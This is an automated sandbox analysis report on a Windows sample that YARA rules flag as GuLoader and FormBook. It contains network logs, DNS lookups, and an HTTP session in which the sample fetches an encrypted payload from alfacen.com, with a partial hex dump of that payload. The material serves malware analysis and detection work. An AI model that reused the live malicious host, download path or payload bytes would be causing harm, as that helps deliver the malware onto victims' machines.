                                                      USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                      GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                      KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-11-05T16:58:29.717909+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.649746TCP
                                                      2024-11-05T16:59:08.238423+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649934TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 5, 2024 17:00:10.361622095 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:10.361649990 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:10.361733913 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:10.373469114 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:10.373482943 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:11.281634092 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:11.281754971 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:11.342179060 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:11.342199087 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:11.342533112 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:11.342586994 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:11.346673965 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:11.391345024 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:11.621912956 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:11.621938944 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:11.622014046 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:11.622037888 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:11.622051954 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:11.622076035 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.004452944 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.004466057 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.004585981 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.004623890 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.004679918 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.004976034 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.005027056 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.009741068 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.009838104 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.010719061 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.010790110 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.047710896 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.047820091 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.124217033 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.124392986 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.164906025 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.165081024 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.262578964 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.262749910 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.282075882 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.282212019 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.326441050 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.326603889 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.379926920 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.380065918 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.443161964 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.443344116 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.497076988 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.497268915 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.519397974 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.519543886 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.614300966 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.614398003 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.633905888 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.634063959 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.678267002 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.678473949 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.731326103 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.731498003 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.751121044 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.751231909 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.848525047 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.848691940 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.868119955 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.868272066 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.871680021 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.871774912 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.965572119 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.965718985 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.985425949 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.985548019 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:12.988826036 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:12.988918066 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.092794895 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.092937946 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.102694035 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.102879047 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.146924973 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.147191048 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.200185061 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.200311899 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.220072985 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.220145941 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.223165989 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.223251104 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.317516088 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.317670107 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.336836100 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.336915016 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.337130070 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.337173939 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.337194920 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.337203026 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.337229013 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.337246895 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.337258101 CET44349983193.107.36.30192.168.2.6
                                                      Nov 5, 2024 17:00:13.337296963 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.347968102 CET49983443192.168.2.6193.107.36.30
                                                      Nov 5, 2024 17:00:13.347982883 CET44349983193.107.36.30192.168.2.6
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 5, 2024 17:00:10.256181002 CET6000153192.168.2.61.1.1.1
                                                      Nov 5, 2024 17:00:10.350374937 CET53600011.1.1.1192.168.2.6
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Nov 5, 2024 17:00:10.256181002 CET192.168.2.61.1.1.10x87deStandard query (0)alfacen.comA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Nov 5, 2024 17:00:10.350374937 CET1.1.1.1192.168.2.60x87deNo error (0)alfacen.com193.107.36.30A (IP address)IN (0x0001)false
                                                      • alfacen.com
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649983193.107.36.304435112C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-11-05 16:00:11 UTC165OUTGET /escDKcLKdKFF2.bin HTTP/1.1
                                                      User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: alfacen.com
                                                      Cache-Control: no-cache
                                                      2024-11-05 16:00:11 UTC344INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Nov 2024 16:00:11 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Wed, 16 Oct 2024 10:03:35 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 289344
                                                      Cache-Control: max-age=2592000
                                                      Expires: Thu, 05 Dec 2024 16:00:11 GMT
                                                      Vary: Accept-Encoding
                                                      Content-Type: application/octet-stream
                                                      2024-11-05 16:00:11 UTC7848INData Raw: af 19 74 5b b0 49 12 ff 74 29 76 cf 05 d8 1f 42 56 7e a6 e5 d9 36 c0 21 1b 4a cf c4 87 98 80 f5 32 bf 57 2e 32 3a 43 f6 36 06 04 9d ad db 3c cb a8 39 bd 3b 79 79 5f b0 e7 9c cb 03 50 bb 23 5c 9a 8f 6a e1 f0 4b 48 62 fc 5b 8b c8 97 a8 1f 2b b0 a2 51 91 50 db 3c 1d ac ea d5 9d f0 fe 75 7f 23 5a b9 ab 76 45 d5 e5 ba 0a e7 de 38 d2 e3 66 f7 f5 87 62 15 d4 39 d7 84 bc 14 7e b2 8f 5e c8 cf be 05 a3 9b 9f 5b 5c 57 fa 5b 68 ab 10 1a 24 88 8a f0 de 36 10 bb ea 2b d3 ba 24 f3 61 ef 3a 07 2a 63 91 55 3e c7 f9 75 b2 c3 1b 2d ef ef 6e 03 79 92 4c d2 a4 3d 3a 24 06 a9 40 c3 aa ce 51 52 ea dc 34 a1 fe d0 57 65 e7 1b 6a c6 2c 86 60 20 96 1b 83 44 af 74 f8 3e a1 ee 86 bf f5 55 34 ad 54 6b 46 b6 90 76 9d 87 9e f5 73 e9 33 37 3e 0f b5 e6 4c 41 5b 02 57 02 4c 8a 31 18 cb fe
                                                      Data Ascii: t[It)vBV~6!J2W.2:C6<9;yy_P#\jKHb[+QP<u#ZvE8fb9~^[\W[h$6+$a:*cU>u-nyL=:$@QR4Wej,` Dt>U4TkFvs37>LA[WL1
                                                      2024-11-05 16:00:12 UTC8000INData Raw: e3 cc 8b 72 d5 5e ed 72 f0 54 4b a0 71 0f cd 20 9e 23 d7 83 b8 15 1d ba 92 6f bc 5e 43 eb 5c 9d 26 1e 75 7f 5f 88 32 54 35 fd 83 b0 ef 5f 10 35 b3 10 22 8e e8 f6 45 e9 de 59 3d 97 af 74 61 7f 49 0e a5 41 9d a1 bf d1 44 a0 2f 81 fd 07 56 af d1 81 4f 4c e1 ca 02 59 b2 c4 4b cc 4a be 11 8f 1b 40 c1 be 70 87 48 f4 cd 4f 9c 96 c2 2c 46 38 ba 61 46 49 e5 cc 37 c2 e3 aa ea 45 eb 09 06 8e f0 5c 47 de 23 e9 d5 94 19 57 c3 e8 d3 da 74 12 7c 20 e0 93 3a 76 39 70 4e 8b 0d f4 2b b1 08 6b 7c 1e b5 ab b6 f2 c0 3f da f1 23 bf 5d a3 88 e4 5f d4 3c cc 0f b5 6c 04 43 69 c8 df 1e 17 75 ba d3 a6 fe a1 16 a7 83 ad e6 61 d0 9f ba cd 6f d9 c4 5e 96 35 30 4b e6 85 ba 90 2c 32 8f d2 6f e8 ff dd 21 58 cb 6f 57 12 97 a7 04 9f 2e 20 cb 8c 02 7f 14 51 08 da a1 a8 32 09 4b 2f ff 16 d6
                                                      Data Ascii: r^rTKq #o^C\&u_2T5_5"EY=taIAD/VOLYKJ@pHO,F8aFI7E\G#Wt| :v9pN+k|?#]_<lCiuao^50K,2o!XoW. Q2K/
                                                      2024-11-05 16:00:12 UTC8000INData Raw: 3a 77 fd 87 ec 55 19 50 46 e8 95 e2 4e 59 11 2f 81 46 cd aa 97 53 ad 66 a9 22 98 ba 4e 3d 6e af 32 d8 ed d4 88 46 45 fa 23 19 6f 45 dc 82 04 df c5 3a 91 ea a8 38 d2 1e c3 a2 8a 30 10 ee 0f 95 fe 86 39 83 df 84 4d ae fe 2d 3a 2c ff 94 a6 c6 ff 6e f5 7a 79 40 08 24 da 5a a5 0a ce b5 e1 3e 5b 40 41 f7 f4 26 94 d3 95 1d 77 28 62 12 d6 b7 ee 5b 15 13 0a ad b2 a0 e3 f4 73 a3 4b c9 55 2c d0 ac 85 35 df ce e9 dc 97 cc 67 53 16 1d 36 2e 17 fb 63 b3 9d be d0 22 a9 e4 c3 b5 36 31 33 ba 4f c4 bd 9e da 85 d4 ce 98 cb 29 b1 67 17 11 64 e9 43 a5 a0 29 e0 02 05 51 ec d9 d0 9e b5 2e c7 8d c6 83 3c dd 7f af 5e 72 41 fa 44 79 b5 7f 77 f8 87 01 28 f5 27 09 95 b1 98 25 d6 ed 89 b4 f3 d2 df 4a 5b 05 0c ff 59 72 b8 15 de 42 d7 6e 63 23 05 ed e3 86 9f d1 49 9a fb 9d eb 77 2c 58
                                                      Data Ascii: :wUPFNY/FSf"N=n2FE#oE:809M-:,nzy@$Z>[@A&w(b[sKU,5gS6.c"613O)gdC)Q.<^rADyw('%J[YrBnc#Iw,X
                                                      2024-11-05 16:00:12 UTC8000INData Raw: bb aa 4e 6e 9f 3a 30 73 9c 59 71 8c 22 41 0b fb 76 9b b8 5d 37 01 0f 57 42 1c aa 0c 6c f5 f8 eb bf 08 e1 d9 98 35 22 35 99 b4 f9 40 90 54 04 f2 4a 72 42 4e 2f b5 b1 40 0e 44 0f e5 82 65 92 ef 98 44 5d fa fc ec 89 c0 66 0d f1 4c d9 36 b8 8e 0d 55 98 95 51 74 ef 51 ea ca 05 03 ef ac 02 05 b6 de 4a 39 09 9a ab 56 f6 1b 62 b7 9b b5 b1 d6 9e ba d4 21 90 f5 b9 45 a6 51 1d d9 79 3d d2 47 19 bd 94 0f 99 bc dc a8 a9 52 26 99 a9 43 d2 fb e4 03 40 73 60 ec 97 50 33 e6 f3 52 24 c7 53 69 7b dd bf 48 1c 4c 3a ba cb 19 36 9f 5c 4a 6b ce e2 33 81 ee 3d 1f 2b 11 92 b6 bb d9 77 7f 16 29 20 88 24 6b f0 28 be b5 e0 6c 29 1f 96 9d 0f c5 55 ee ee ef b4 f1 1a 32 0a 01 15 25 9d 3c 21 73 fc ec 05 05 1a 73 ea 06 c4 65 f8 5c c3 1f f9 10 b3 3c e3 1b 77 7b 6b a1 f2 dd a5 60 8b 61 41
                                                      Data Ascii: Nn:0sYq"Av]7WBl5"5@TJrBN/@DeD]fL6UQtQJ9Vb!EQy=GR&C@s`P3R$Si{HL:6\Jk3=+w) $k(l)U2%<!sse\<w{k`aA
                                                      2024-11-05 16:00:12 UTC8000INData Raw: 7f 24 03 e7 ba 6b 47 30 a2 fd 05 c9 67 31 6a 1a d6 df aa 6b 70 a4 bc f4 a0 61 53 92 cc e1 63 10 30 f2 66 93 da ed d3 13 17 3f 74 4e 5e d9 67 6b b5 3b 70 97 a7 3a 50 1b b0 10 1f 0d 40 dd 52 2b 88 9b da 47 f2 79 be ae 17 ca 96 f8 4f d5 1e c8 25 f6 05 e9 b0 da 13 c4 68 01 d1 59 fd 51 c8 17 ec d7 4e 25 f2 e4 60 81 c7 fd e4 b9 8d d0 83 95 27 45 8f b2 b2 81 83 65 a3 5c 40 45 5b 5a ca 6a 5d 22 33 36 82 3f 31 b8 d6 63 ad 4b ab 12 9e cf 37 43 4c 5c b1 33 cd 30 17 81 a8 43 da 32 23 e8 f0 46 4d 3d b6 eb 1f e2 16 8b 7f a5 7d b9 15 8d 3f 76 82 31 0e 24 c0 28 9e 8c ab df db a5 15 18 b9 09 4b 30 6a 15 e9 8f e2 dd 9a 94 0e dd a8 a8 e1 fb 57 00 64 81 7b 57 7d 7b 64 e8 fa 48 e7 5a d2 38 3b d4 70 09 b2 87 66 98 17 6e d5 66 b8 dc 76 35 f2 b1 81 15 7a c6 bc 9d e8 2a f7 f3 4b
                                                      Data Ascii: $kG0g1jkpaSc0f?tN^gk;p:P@R+GyO%hYQN%`'Ee\@E[Zj]"36?1cK7CL\30C2#FM=}?v1$(K0jWd{W}{dHZ8;pfnfv5z*K
                                                      2024-11-05 16:00:12 UTC8000INData Raw: 5c 26 b4 0d bb bb cf da d1 92 e1 00 47 99 fe 28 a5 b5 88 4d 9a 17 b3 15 a9 18 13 b8 48 85 ec 02 ce 8e 73 2c 53 ff 64 04 c0 3a 8d 00 10 64 79 f4 87 4b f9 e0 90 7b 96 d4 42 7d f4 06 00 e2 c7 cc ab 6b 3e b9 7d 6f 5c ed ae d6 b3 5e ec ce 76 31 2e 8a 4e f3 88 cc 38 8f 4e 25 94 4e 62 5e fc 8f 37 ee c8 a2 91 76 6b 8b 5e a9 54 46 70 ec 54 03 c5 16 09 f6 41 12 8b 15 78 d2 25 12 fe fc de 41 69 ae f6 81 bb 52 2d 07 8c 9e 0a 5d 89 a0 fa f6 4c c4 7a 3a 1d 59 3f be b3 6a 61 4a 36 dc 5c 59 46 c2 e5 33 18 a5 a7 cd d7 45 35 58 33 13 7c 25 04 a4 60 db 6c ed 71 ed 68 36 f8 5b c6 5a cd 17 44 e2 12 c1 32 1d e3 21 bf 58 5f 42 85 fd 2e 3f 82 fe 17 16 0d 4f 8a 11 f4 08 9b 70 79 cd fc ef 42 fa d1 20 50 57 76 14 a4 54 81 7d 48 51 d5 ab a3 22 e3 87 16 32 54 49 9f 1a e3 ac 03 c4 c1
                                                      Data Ascii: \&G(MHs,Sd:dyK{B}k>}o\^v1.N8N%Nb^7vk^TFpTAx%AiR-]Lz:Y?jaJ6\YF3E5X3|%`lqh6[ZD2!X_B.?OpyB PWvT}HQ"2TI
                                                      2024-11-05 16:00:12 UTC8000INData Raw: 40 f1 bc cd 3a 57 80 4d 3b 53 d6 28 77 64 ea bc ab 21 fc 0d 5a 4c d1 d7 53 45 9f 0d 8f d1 df 97 80 6f 9b 52 17 d2 1d 01 9b d7 65 4c 56 33 ef cc 2b 0d 84 59 2f ae 09 89 cd 63 cb 69 f0 32 db 4a f8 47 55 c0 1a cc 04 d0 89 2b 9a 15 c1 24 96 e2 cf 54 e9 8b 34 0f 5b b7 43 eb c0 c3 32 7f c5 58 4f d6 dd 0b 37 71 d5 90 81 0f fd 90 7a 72 46 5d 68 98 97 5b 6a 2f dc d9 cf 91 b8 42 3b de ae 5d b5 e4 ad 4d 8f 1b 19 2a 0d 11 28 fa 2a ec 70 66 1c 0e f0 00 30 d4 cf c0 59 2d 34 5b 46 6d 5e ea e4 f6 5f bf 09 c0 87 06 1d dd 80 cc e6 76 41 15 78 f3 31 32 f7 bd 6e 97 a7 07 28 93 8f 20 8b df 0d 5b f8 14 fc d4 6c bb 20 d0 67 55 22 16 ee d6 05 6b e8 7a 67 03 77 27 2e bf ff 7d 45 73 07 ec 86 c6 32 a0 9b 05 f5 cf f2 96 b3 ef 7a f6 59 6c a2 3a 27 9e c0 79 4a 88 75 ed 09 28 21 cb b7
                                                      Data Ascii: @:WM;S(wd!ZLSEoReLV3+Y/ci2JGU+$T4[C2XO7qzrF]h[j/B;]M*(*pf0Y-4[Fm^_vAx12n( [l gU"kzgw'.}Es2zYl:'yJu(!
                                                      2024-11-05 16:00:12 UTC8000INData Raw: a1 c4 e4 45 26 0f 0d 2e fd 88 11 ea 0b ca ed 66 a1 47 d8 5b 5d b7 b6 69 2f 71 ff 71 42 11 75 8f ad ba 0b 62 83 7f 49 67 03 9f c8 ab 00 99 a1 5c 1f a8 10 8c 32 f3 b0 74 a3 61 60 9b 33 08 c2 45 90 15 fb 7e e6 24 fe 20 c6 93 4c f9 bd 8d 56 8a b2 86 08 d1 af 1c af c8 07 8f e2 cf 05 eb 08 3b ae dc 43 d8 a2 5a 78 7c dd c8 d3 c7 d6 57 52 3d fa 97 e9 7f 68 10 01 09 ed 25 4f 64 93 48 2d 36 75 6c 65 50 28 7b 1e a9 c2 99 8f 35 72 8e 8a 84 6f f1 48 40 a7 be f9 d7 87 0c ed 22 7f a9 2f bd 8f bf 58 85 c3 48 ea c4 ce 77 2e fb f4 58 39 08 2a 7e 4f 8c 48 7c 2f 2d f7 a9 c6 20 8d 3c 88 3f 42 14 0f 85 13 a2 ee bb a9 f6 98 d1 7e fb 59 b9 b0 3f 8e 73 84 23 00 e5 62 df 54 20 50 67 fa c4 30 8b b8 04 94 b6 4f f8 ce b0 64 fe b5 b9 35 a5 23 0b 1a e9 27 d7 ca 07 f0 ac 77 6c 5e 3f 68
                                                      Data Ascii: E&.fG[]i/qqBubIg\2ta`3E~$ LV;CZx|WR=h%OdH-6uleP({5roH@"/XHw.X9*~OH|/- <?B~Y?s#bT Pg0Od5#'wl^?h
                                                      2024-11-05 16:00:12 UTC8000INData Raw: 08 c2 0a 28 56 48 88 ae 0a 09 7a dd ea f7 31 33 5d 64 ec a2 a6 20 4b cd c7 92 b0 35 12 77 c6 42 d9 54 a1 30 ce 70 c2 a0 87 6e 86 eb d0 df 73 f4 47 61 e3 db 39 93 af 3d 25 0a 50 ea 7c 73 93 c8 f0 a3 76 04 7e 6e 23 ba b5 b0 9c 73 35 70 09 dc 63 11 ce 0e 1e 1d 15 23 6a 2d 84 19 1e c5 42 de d2 26 55 3b 57 fc 5f 46 83 1a de c5 d4 dc 49 74 62 de b9 7e 39 9f c1 a8 25 0b 7d 01 40 94 54 18 c9 5f 63 42 55 e6 04 8c 21 54 de 61 5c 2b 6c 37 79 a0 5f 76 ec 1b f5 bf fd f9 ba 39 35 1d 74 c6 ee ae 35 f8 8c 42 ef ce b9 00 ad 2d 0c ac 88 7a 6e 2e c1 b1 b6 ff d5 36 ea 3a b9 1e 95 e0 e9 64 a7 89 12 98 6c c7 3d 04 8c cf 11 b9 a8 fc 61 00 46 19 b1 8a 1d c2 f1 ef 18 66 3a a7 76 f9 cb 2e 93 b4 d6 66 7a 0d a5 a0 3b 67 14 fb d8 e4 32 14 86 d4 a6 f8 e0 4a 68 aa 11 cc b6 ef af 30 9f
                                                      Data Ascii: (VHz13]d K5wBT0pnsGa9=%P|sv~n#s5pc#j-B&U;W_FItb~9%}@T_cBU!Ta\+l7y_v95t5B-zn.6:dl=aFf:v.fz;g2Jh0
                                                      2024-11-05 16:00:12 UTC8000INData Raw: 6b 9a 5f be 33 1c d9 0a f9 ea 4d 6c 17 d5 c7 6b d5 c5 6d 67 90 62 09 38 fe 44 41 0a 0a 50 b9 5b aa a5 b9 d7 3b 9a 9e 37 f4 c4 2e 2e cb 07 b5 d7 b2 8e bd 50 90 0d 48 a2 a2 f3 5a 78 3c ae fd 2a a2 cf 93 33 da 8a 7f cb 1d d9 d2 40 4a b5 16 60 be f0 4c 27 07 a9 8d 09 15 e2 15 0f 7e 0e d7 1c eb 8f 62 67 72 e5 a7 88 a8 af 72 20 17 ff 43 30 51 02 28 76 d1 13 14 49 cb 6d e4 6d be ac f7 fe cf d3 03 86 0f 92 51 00 ea 13 d3 9a 92 8e f9 c9 46 8c 4e 05 d2 95 8c 56 de 2d 3e 4b f5 25 d0 fb cc c3 19 26 85 0e 7e 99 30 f7 8b c8 ae cc 69 9a 16 13 89 b9 ab be 29 7b 78 bd 32 ee 08 5b 38 0d 63 c8 27 c6 8d b6 b1 5f 39 40 a0 30 e7 03 7a 5d 5d 5b b7 24 47 77 a8 21 bd 83 b2 aa 64 0c e2 e1 de 0b 11 85 90 2c 98 0e bb 44 dc c2 5a 05 ab 8f cc 5c 0c 5b f3 08 3f ee 82 c2 80 88 d0 81 3c
                                                      Data Ascii: k_3Mlkmgb8DAP[;7..PHZx<*3@J`L'~bgrr C0Q(vImmQFNV->K%&~0i){x2[8c'_9@0z]][$Gw!d,DZ\[?<


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:10:58:11
                                                      Start date:05/11/2024
                                                      Path:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\0GuwV0t2UU.exe"
                                                      Imagebase:0x400000
                                                      File size:695'648 bytes
                                                      MD5 hash:4EA3D3A468F53CA1B57D8C2DB7EB3037
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3136688190.00000000049AA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:10:59:52
                                                      Start date:05/11/2024
                                                      Path:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\0GuwV0t2UU.exe"
                                                      Imagebase:0x400000
                                                      File size:695'648 bytes
                                                      MD5 hash:4EA3D3A468F53CA1B57D8C2DB7EB3037
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3534624470.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Reset < >

